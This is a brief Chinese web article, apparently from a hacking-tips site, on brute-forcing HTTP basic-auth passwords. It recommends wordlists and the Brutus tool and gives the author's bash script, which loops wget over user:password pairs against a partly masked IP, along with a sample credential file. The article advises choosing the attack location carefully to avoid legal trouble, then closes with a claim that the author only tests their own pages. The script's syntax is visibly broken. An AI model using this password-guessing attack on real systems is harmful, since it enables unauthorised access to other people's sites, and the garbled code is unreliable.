首先
你总得有像样
字典吧
去国外网站WebSite上下Wordlist吧或者自己写个简单
来生成字典如果不会写呵呵呵呵那就下载字典生成吧 (不过网上下wordlist或者用网上下字典生成生成字典好像都不好用) 其次
你总得有工具来运用字典干活吧可以从网上下载工具比如大名鼎鼎brutus运行时界面如下:当然
也可以自己写工具笔者就写了
个简单脚本来干活:#!/bin/bash
#
user_password_file=/root/wget_cracker_user_password
while read user_password ; do
user=$(user_password#:}
password=$(user_password%:}
wget -q -t 2 -T 15 --http-user=$user --http-password=$password -http://219.136.x.x:8080/tool.asp
[ $? -eq 0 ] ; thenecho "OK I got an password: user: $user ; password: $password !"
exit 0
fi
done < $user_password_file
exit 0
-bash-3.00# cat wget_cracker_user_password
abc:adeeffaf
deff:afkafsasf
guest:affaewf
guest:guest
guest:afdasf
再次
你应该清楚:暴力破解不是SYN攻击IP 欺骗是不可能你老巢在哪里受害者眼就能看出来所以好好选择“狙击地”吧搞不好会吃官司哦最后
本人进行HTTP验证暴力破解只是验证自己保护WEB页面口令强度绝不会去给别人网站WebSite添麻烦切记篇文章: 推荐:Cookie注入是怎样产生篇文章: 网站WebSite防黑:最快速、有效iFrame治标解法
最新评论